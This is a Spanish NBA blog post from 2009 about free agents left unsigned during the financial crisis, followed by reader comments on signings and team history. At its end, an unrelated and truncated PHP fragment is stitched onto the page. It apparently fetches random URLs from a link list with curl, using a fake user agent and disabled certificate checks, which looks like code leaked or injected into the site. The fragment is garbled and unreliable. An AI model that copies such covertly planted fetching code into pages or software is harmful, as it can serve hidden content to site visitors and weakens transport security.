Mucha tela que cortar

06 de August de 2009 por txusma

Estamos a 6 de agosto y aún hay muchos jugadores que no saben en que equipo jugarán la temporada que viene. Y no hablamos de jugadores de tercera línea sino de por ejemplo uno de los 3 mejores reboteadores del pasado año, de un jugador con 10 participaciones en el AllStars consecutivas, del campeón del concurso de mates, de las elecciones 2 y 5 del draft de 2005, de jugadores claves (con buzzer-beater incluídos) en los pasados playoffs… Jugadores que verían en cualquier otro verano, como los diferentes equipos de la NBA se pelean por hacerse con sus servicios. ¿Pero qué es lo que pasa este año? ¿Porqué hemos llegado a esta situación?

La NBA es un negocio y como todo negocio no puede quedar al margen de la crisis global que asola el mundo. Muchas franquicias sufren graves problemas económicos y no pueden permitirse el lujo de derrochar ni un solo centavo. El límite salarial ha bajado y se rumorea que de cara a la siguiente temporada todavía bajará más. En esta situación muchas franquicias se han planteado no rellenar el cupo de 15 jugadores sinó mantener un nucleo de 13. Se acabó el pagar a jugadores de cuarta fila que probablemente no jugarán ni 30 minutos sumando todos los partidos de la temporada. Llegó la hora de ahorrar. Y ahorrar también significa pensarlo 2 veces antes de afrontar una contratación importante (a no ser que seas los Raptors).

Además esta situación de crisis ha coincidido con un año en que pocas franquicias tenían espacio salarial para acometer grandes fichajes y una de las pocas que tenía, los Pistons,  lo gastaron todo el primer día con las incorporaciones de Ben Gordon y Charlie Villanueva y alguna otra, como los Blazers, ya  han realizado sus movimientos clave (Andre Miller). Está claro que muchos equipos han planificado sus economías de cara al próximo verano, el del 2010, donde grandes jugadores de la talla de Lebron James o Cris Bosh, por ejemplo, saldrán al mercado. Por eso, nadie quiere afrontar contrataciones este verano que pongan en peligro los fichajes del verano siguiente.

Y a todo esto, aquí tenemos una mini lista de los agentes libres más destacados que siguen pasando los lunes al sol:

David Lee: ¿Cómo puede ser que un jugador capaz de anotar 16 puntos y coger 11.7 rebotes por partido no tenga varias ofertas encima de su mesa? El ala-pívot de Sant Louis busca un acuerdo multianual que le proporcione unos 10 kilos por temporada pero los Knicks sólo le ofrecen un año de contrato. No hace falta ser muy listo para adivinar el porqué. Además los pocos equipos que tienen espacio salarial están más concentrados en el futuro (proyecto 2010, renovación futuras de sus jóvenes estrellas, …) que en el presente y tampoco no quieren hacer una oferta a la baja porque saben que los Knicks tendrán toda una semana para pensar si la igualan (todo un mundo en los tiempos que corren) y posiblemente la igualarían sin problemas y buscarían un sign-and-trade. Difícil situación la del David Lee que parece abocado a aceptar el contrato por la Mid Level y algo más y un solo año y así salir al mercado el verano que viene, ya como agente libre sin restricciones.

Allen Iverson: ¿Sorpresa? Ninguna. Ya me diréis que franquicia puede querer contratar a un jugador que no quiere dejar de tirar lo que siempre ha tirado, que no quiere dejar de ser la primera referencia ofensiva del equipo y que no quiere salir del banquillo por el bien del equipo… A los 34, Iverson es menos Iverson pero él parece que no acaba de entenderlo. Knicks, Clippers y Grizzlies parecían interesados pero no me extrañaría nada que estuviéramos delante de otro “caso Sprewell”.

Glen Davis: Ante las ausencias de Kevin Garnett y Leon Powe, Glen Davis dio un paso al frente y se convirtió en uno de los factores claves de la buena actuación de los Celtics en Playoffs. Con partidos de escándalo y canastas decisivas parecía ganarse a pulso su renovación por la franquicia verde pero de momento no ha sido así e incluso ha visto como se ha complicado su futuro con las adquisiciones de Rashard Wallace y Shelden Williams. Él esperaba un contrato por la Mid Level pero parece que los verdes no están por la labor de ofrecerle más de 2-3 millones por año. Y lo peor es que no parece que haya alguien más en la liga que le vaya a ofrecer más de eso.

Raymond Felton: Otro jugador que se encuentra que sus peticiones (6.5 millones al año) no son escuchadas. En todo caso su Qualifying offer es bastante elevada (5’5 millones) por lo que parece que jugará otro año en los Bobcats y saldrá como agente libre sin restricciones en el mercado del año que viene.

Ramon Sessions: De todos los jugadores de la lista parece ser el que más cerca ve su salida del purgatorio y es que las negociaciones con los Knicks van por buen camino y se puede cerrar en los próximos días un acuerdo por 4.5 millones y varios años de contrato. No parece que los Bucks vayan a igualar ninguna oferta superior a 4 millones que les metería por encima de la Luxury Tax.

Nate Robinson: Los Knicks le presentaron una oferta de 5 millones por un solo año de contrato pero él la rechazó porque esperaba encontrar algo mejor. Ahora, si los Knicks se hacen con los servicios de Ramon Sessions o Jason Williams, puede ver como esa oferta desaparece y ser obligado a jugar un añito más en New York por  “sólo” 2.9 millones. Parece ser que Olimpiakos le ofreció 10 millones por 2 temporadas que también rechazó en su momento.

Linas Kleiza: El lituano quiere quedarse en la NBA pero de momento no parece que la NBA quiera mucho a Kleiza (o al menos debe ser lo que él piensa). Los Nuggets pueden hacerse con sus servicios por una temporada más a cambio de 2.7 millones de dólares pero equipos como los Raptors o los Pistons han hablado con el jugador y pueden presentar una oferta en los próximos días. Olimpiakos también ronda por ahí.

Comenta

17 comentarios a esta entrada

  1. Hakeem dice:
    #1

    -Lo de David Lee es porque con el sistema D’Antoni sus números quedan bastante inflados…10 millones por 5 años son un poco excesivos y además ha dicho que no a otras franquicias como Grizzlies o Raptors que eran quienes se lo podían pagar…Se ha puesto demasiado chulo.
    -El caso de Glen Davis me recuerda al de Jerome James…Solo por unos buenos play-offs no puedes pedir el oro y el moro.
    -Raymond Felton se merece la mild…No se en que piensan los equipos.
    -A Kleiza si le pagan en Olimpiakos 2 millones de euros ya son 2.7 millones de dolares…Dificil porque es posible que el Olympiakos le pague mas.
    Saludos!

      Citar

  2. NBA LAKERS BLOG dice:
    #2

    El Olimyakos está queriendo pisar fuerte en el mercado mundial de jugadores. Bien por ellos.

    Lo de Iverson no me sorprende, lo de Lee mas o menos… pero sí me sorprende que los jugadores no sean concientes del presente y piensen q valen el doble de lo que realmente valen….

    Davis debiera qudarse en Boston.

    Saludos!

      Citar

  3. Óscar dice:
    #3

    De esos nombres, me parecen muy interesantes David Lee y Ramon Sessions, que se han ganado a pulso en mi opinión pedir esas cantidades, a diferencia de otros agentes libres. Quien los fiche acertará.
    Esperemos que jugadores como Nate Robinson, Iverson, Kleiza o el mismo Sessions sigan en la NBA (como ha hecho Anthony Parker), por el bien de la Liga e incluso diría también de los clubes europeos que se embarcan en esos fichajes, siempre arriesgados. Ahí están los ejemplos de Childress, Pargo, Arroyo, Nachbar, Wells, Brezec, Boykins, Delfino, Jennings, Garbajosa, Ilyasova, el retornado Krstic… Son jugadores cuyo sitio está en la NBA, por sus propias características, jugadores que rinden más en un nivel más alto, con la máxima exigencia y motivación.

      Citar

  4. Kiki dice:
    #4

    De los últimos movimientos, muy bueno el fichaje de Ryan Hollins por Minnesota para dar descanso a Kevin Love y Al Jefferson. Hollins me parece un jugador infravalorado y que va a explotar sus cualidades defensivas, con su envergadura e intimidación, además de su potencia y rapidez para sus 7 pies.
    También intresantes la llegada de Marcus Williams a Memphis, la de Warrick a los Bucks y no entiendo que los Clippers corten a Mike Taylor, que demostró ser útil la temporada pasada y teniendo en cuenta además que no les sobran bases de buen nivel, sobre todo físico. El tío Dunleavy…

      Citar

  5. Óscar dice:
    #5

    Qué buena noticia para un blazer como yo: Roy renueva por 5 años por unos 78 a 82 mill. $, la última opcional. El siguiente será LaMarcus Aldridge, eso espero…
    No sé si hay equipo para luchar por lo máximo este año, quizá es un poco pronto, pero el año pasado, tras cinco años sin playoffs (desde la 2003/04, y tras 21 años seguidos en post-season, récord absoluto NBA), yo esperaba simplemente estar entre los 6 ó 7 primeros del Oeste y Portland consiguió la segunda mejor marca de la Conferencia, aunque es verdad que empatado con Denver y San Antonio (54-28), por lo que finalmente fue el 4º en el “bracket”, peridendo clara y justamente con Houston en primera ronda.
    La verdad es que la plantilla ilusiona, ya lo analizaremos. Los equipos se han movido bastante bien en el Oeste, y lo lógico es pensar que los Lakers volverán a imponerse, pese a la baja de Ariza, que para mí es mucho más importante de lo que parece, aún con la llegada de Artest.
    Lo mío con Portland viene desde niño, y no fue por otra cosa al principio que por el atractivo de los tres uniformes, como en el fútbol con Ajax y Sao Paulo. Ha habido auténticos equipazos, pero sin llegar a lograr el título de 1977 con el gran Bill Walton, tras sólo 7 años de Historia (6/2/70).
    ¿Hay algún blazer más por aquí? ¿O me vais a dejar solo esta temporada?.

      Citar

  6. Txusma dice:
    #6

    Yo no soy de los Blazers pero Brandon Roy me apasiona y eso que creo que el estilo de juego de McMillan sumado a la presencia de una español en el equipo está haciendo que le crezcan muchos detractores. A ver este año con Miller en la pista como se adapta.

      Citar

  7. sabas dice:
    #7

    A mi los Blazers siempre me han caido simpaticos, ay si Kein Duckworth hubiera dado mas de si y siempre con sus problemas de soprepeso; pero seguramente a muchos esa epoca les queda muy lejos. Creo que han hecho uno de los fichajes del verano con Miller, me parece un grandisimo base.

      Citar

  8. ÑBA dice:
    #8

    Qué gran verano estamos teniendo!

    Espero que la Regular Season esté a la altura de los movements…

      Citar

  9. Froster dice:
    #9

    No creo que Sessions acabe en los Knicks el año que viene, sobre todo teniendo en cuenta el entrenamiento privado de Williams.

    Pueden ahorrarse algo de dinero, tener un base de (supuesta) garantía y hacer una ofensiva más fuerte por Lebron el año que viene.

      Citar

  10. pcerezo dice:
    #10

    Lo siento Oscar pero os metimos 4-0 en aquella final del 90…jjj
    Para los Blazers fue imperdonable perder ese septimo partido en Los Angeles con 16 puntos de diferencia al empezar el último cuarto…pero como alguien ha dicho por ahí…Danleavy…

    Un saludo,
    Pablo

      Citar

  11. Fran Reyes dice:
    #11

    Una tela se corta: Big Baby ha renovado con los Celtics

      Citar

  12. Óscar dice:
    #12

    Si te fijas en la Historia, los Lakers han ganado a Portland casi siempre en Playoff, sobre todo en primera ronda además… Sois nuestra bestia negra y el equipo grande a batir ( beat L.A. !! ). Nos tenéis comida la moral, sí. Pero el Rose Garden se le atraganta a LAL en los últimos años, así que cuiadín…je.
    Excepto en 1977, que fue campeón Portland en sus ! primeros playoffs !, cuando ganó a LAL 4-0 en Final de Conferencia ( “Blazermania” ), los Lakers han ganado a Blazers en muchas ocasiones en Post-season, pero en ese año 1990 que te refieres con Adelman (59-23), llegamos a la Final contra Detroit (4-1), tras eliminar a DAL, SAS y PHX. Un equipo con Porter, Drexler Petrovic, Kersey, Buck Willams (NJN por Sam Bowie…) o Duckworth, como sabéis fallecido por lo que este año los blazers han llevado una cinta-homenaje con el “00” toda la temporada.
    Pablo, cuando nos barristeis fue en 1990-91 (63-19, récord de franquicia y el mejor de la NBA) también en Final de Conferencia (4-1). Ese año fueron all-star Porter, Drexler y Duckworth, y estaba ya Danny Ainge. Era la “época dorada” de principios de los 90.
    Lo de desperdiciar un 73-58 en el último cuarto del 7º partido (!!!) vs. LAL en final del Oeste fue en 1999-2000, efectivamente con Dunleavy en su penúltima campaña, y en la primera de Pippen. Eran ya los “Jail Blazers”… A partir de ahí, una época bastante oscura de la que salimos ahora.
    P.D. No os asustéis, siempre tengo chuletas de papel a mano, sobre todo las que me hago de la Wikipedia de Portland… Es lo que tiene el fanatismo…

      Citar

  13. Kiki dice:
    #13

    Últimos movimientos, algunos muy destacados:
    * Olympiacos ficha nada menos que a Kleiza y Von Wafer.
    * Kurt Rambis es el nuevo entrenador jefe de Minnesota.
    * Oberto firma por Washington.
    * Glen Davis renueva con Boston y Leon Powe firna con Cleveland (una incógnita su estado físico).
    * David Andersen (Barça) debutará en la NBA con Houston a los 29 años, por 2,3 mill. $.
    * Ben Wallace regresa finalmente a Detroit tras el traspaso de Shaq a CLE y ser cortado por PHX.
    * NOH traspasa a Rasual Butler (muy interesante) a Clippers por una 2ª ronda + dinero (trade exception).
    * Denver traspasa a Steven Hunter a Memphis (se pasó la temporada lesionado o sin jugar). Memphis…
    * Renuevan Ivey con PHI y Marvin Williams con ATL, fundamental para los Hawks.

    Esto está interesante, con las restricciones y la crisis los equipos se tienen que estrujar los sesos para mejorar sus resultados de la temporada anterior. Lo de Memphis parecen desde fuera siempre palos de ciego, aunque ellos sabrán lo que hacen…

      Citar

  14. Óscar dice:
    #14

    De todos los movimientos del verano me quedo con los de CLEVELAND, por lo sorprendente de la gran cantidad de cambios que están haciendo, rompiendo en mi opinión la dinámica de un equipo que logró el mejor récord de la Liga, el MVP y el premio de mejor entrenador. Funcionó con una química increíble desde el primer partido, que sólo se rompió en la Final del Este, cuando es cierto que perdieron con claridad frente a Orlando. La reacción en cadena después de la derrota me ha parecido exagerada, cuando posiblemente lo lógico habría sido realizar algún retoque manteniendo el bloque.
    Han fichado a S.O’Neal, A.Parker, J.Moon y L.Powe, perdiendo a B.Wallace, Pavlovic o Kinsey. El problema es que tienen poco margen para renovar a agentes libres como Ilgauskas, Szczerbiak (se irá), Joe Smith o L.Wright. En el Draft poco han podido hacer, tan sólo podrían incorporar a D.Green (UNC), y no a Eyenga o Preldzic, que seguirán en Europa. En principio el potencial puede ser superior, pero creo que se han precipitado con tantos cambios, no sé que opináis. La figura de Shaq condicionará y cambiará todo su juego.
    La renovación de Royal Ivey por PHI (por sólo un millón $) no me la esperaba, tenía confianza en que Portland lo contratase al ser uno de los mejores defensores de perímetro a mi juicio, siendo ese uno de los aspectos a mejorar precisamente en los de Oregon, que permitieron porcentajes muy altos a sus rivales el año pasado desde posiciones exteriores, sobre todo en triples. De todas formas, tienen en la Summer League al agente libre Thomas Gardner, buen jugador poco utilizado en Atlanta hasta ahora y que responde también a ese perfil físico, defensivo, joven (24) y capaz de jugar de 1/2.

      Citar

  15. pcerezo dice:
    #15

    Ey Óscar,

    Yo no uso wikipedia ni NBA.com, utilizo mi memoria y recuerdos. No recordaba si era 90 o 91 la final con los Portland, recuerdo que fue el segundo anillo de los Bad Boys y el fin del dominio de la Motown para cederlo a la ciudad del viento.

    Recuerdo aquel equipo de los Pistons, con Thomas, Dummars, Aguirre, Mahorn, Laimbeer, El Gusano, Dennis Rodman, El microondas, James Edwards… Un equipo tremendo.

    Portland tenía un gran equipo pero estos tíos tenían una capacidad de competición brutal.
    En el 88 no se clasificaron para las finales por aquel saque de banda interceptado por Bird, en el 89 merecieron ganar las finales pero en el sexto partido una extraña jugada de Rodman les privo del título, en el 90 ganaron a Lakers y en el 91 barrieron a Portland. En el 92 cedieron el trono al Suberbulls de Jordan. Nada volvió a ser igual.

    Por el camino se sucedieron eliminatorias tremendas contra Celtics, Bulls, Cavaliers (de Price, Ehlo y Brad Dougherty)….Eran los tiempos en los que había cuatro conferencias y la Central Division era un polvorín. Aquellas noches de Cerca de las Estrellas me encantaba ver esos partidos de la Central entre Cavaliers, Indiana, Bulls, Pistons. Ese color especial que tenían las retransmisiones. Portland también molaba verlo, las torres gemelas de Houston, los chicos de Dallas con Rolando Blackman y aquel base que luego jugó en los Knicks (creo que era Ron Harper). La eclosión de Charles Barkley en los Sixers, que recuerdos madre. Eso fue para mi el principio de todo y el comienzo de mi gran afición a la NBA.

    Pero bueno Óscar, como seguidor de los Blazers siento decirte que a corto plazo no les tengo fe estos Blazers. O Greg Oden cambia las prestaciones de su primer año o se van a quedar en un equipo de Play Off alto pero nada más (son las sensaciones que me transmite la plantilla).

    Un saludo,
    Pablo

      Citar

  16. Óscar dice:
    #16

    A ver qué pasa Pablo con estos Blazers. Como decía en otra entrada, la clave para mí tras el fichaje de Andre MIller estará en que Oden y Webster rindan a su nivel, y eso sólo ocurrirá si no tienen de nuevo lesiones. Conseguir el 2º mejor récord del Oeste 08-09 con DEN y SAS no me lo esperaba ni yo, así que todo puede pasar esta temporada, con un año más de rodaje para un equipo tan tierno y con un base de elite. El título o pelear por él lo veo complicado, por supuesto.
    Yo sí veo los apuntes que me hago, pero sólo en cuanto a ver números y saber qué temporada pasó esto o aquello. Luego me trago muchos vídeos (incluido VHS) que grababa mi hermano mayor en los 80 y 90 (él tiene 35 tacos) y que al final los acabo viendo yo. Y por supuesto los partidos históricos que ponen en C+ Deportes a las tantas y que hay que grabar también, con los que se aprende mucho. Desde pequeño me hacía mis plantillas, anotaciones, etc (igual que con el fútbol). Mi madre me decía que me sabía hasta el nombre de las señoras de la limpieza de los equipos NBA… Trecet, luego Daimiel y Montes…qué tiempos. También la NCAA me vuelve loco, me veo todos los partidos que puedo del Torneo Final, que ponen íntegro todos los años.
    Los bad boys eran la bomba, he visto esta tarde el 7º partido de la final 88 en el Forum, que supuso el 2º título consecutivo para los Lakers, primer equipo que lo conseguía desde Boston en 1969. En los dos años siguientes, 89 y 90, serían campeones precisamente los Pistons de Chuck Daly, que ha muerto esta primavera (vaya añito con Daly, Tisdale, lo e Tex Winter, etc). Un equipo hecho para competir. Te olvidas de la “araña” John Salley en esa rotación… imperdonable jeje. En el 88 estaba Dantley y no Aguirre, que llegó tras el intercambio con Dallas en el 89, tras el primer anillo.
    Por cierto, creo que nunca ha habido 4 conferencias, sólo Este y Oeste, al menos en la NBA (no sé en la ABA o la CBA). Es cierto que el Este y sobre todo la Central Division eran muy fuertes en esa época que dices, con un Oeste con un baloncesto mucho más abierto y ofensivo.
    Y en cuanto a Ron Harper (jugadorazo) creo que no jugó en NY o DAL. Empezó en Cleveland, luego Clippers y al final con Jordan en los grandes Bulls, y creo que jugó algún año con los lakers, ya veterano. Pero no estoy seguro, espera que lo veo en mis chuletas…jeje

      Citar

  17. pcerezo dice:
    #17

    Oscar,

    Si he escrito Ron Harper quería decir Derek Harper, te acordará base que jugo en Dallas y New York. Un buen anotador. Jugaba al lado del panameño Rolando Blackman.
    En cuanto a Salley he puesto el gusano y tienes razón el mote era “La Araña”, joder que cabeza.
    Ron Harper ha sido uno de los mejores casos de adaptación al medio que se han conocido. Empezó como gran anotador en Cleveland (sensacional equipo ese con Price, Ehlo, Dogherty…), fue traspasado a Clippers y en la segunda etapa Bulls se dedicó a la intendencia y era pieza clave en la defensa de los Bulls. Acabó su carrera en Lakers donde creo que gano un anillo o dos más. Impresionante carrera.
    También quería decir que había cuatro divisiones y no conferencias (las prisas…) ahora hay seis.

    Un saludo,
    Pablo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>